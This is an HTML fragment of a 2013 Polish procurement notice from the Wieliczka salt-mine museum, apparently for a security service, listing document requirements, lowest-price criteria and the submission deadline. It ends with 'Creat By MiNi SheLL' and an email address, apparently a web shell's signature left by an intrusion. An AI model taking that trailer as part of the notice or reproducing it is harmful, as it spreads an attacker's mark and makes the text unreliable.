obejmującej swym zasięgiem miasto Wieliczka. 3. Świadectwo broni które umożliwi dopuszczenie jego pracowników do posiadania broni na terenie obiektów Muzeum, wydane zgodnie z przepisami ustawy z dnia 21 maja 1999r. o broni i amunicji ( tekst jednolity Dz. U. z 2004r. nr 52, poz. 525 z późn. zm.)</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Kartę tytułową oferty  - sporządzoną na formularzu stanowiącym załącznik nr 1 SIWZ. 2. Wycenę oferty - sporządzoną na formularzu stanowiącym załącznik nr 2. 3. Oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 ustawy Pzp. -  załącznik nr 3 SIWZ. 4. Pełnomocnictwo do podpisania oferty (jeśli dotyczy)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.muzeum.wieliczka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Żup Krakowskich Wieliczka, ul. Zamkowa 8, 32-020 Wieliczka, sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.05.2013 godzina 10:00, miejsce: Muzeum Żup Krakowskich Wieliczka, ul. Zamkowa 8, 32-020 Wieliczka, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com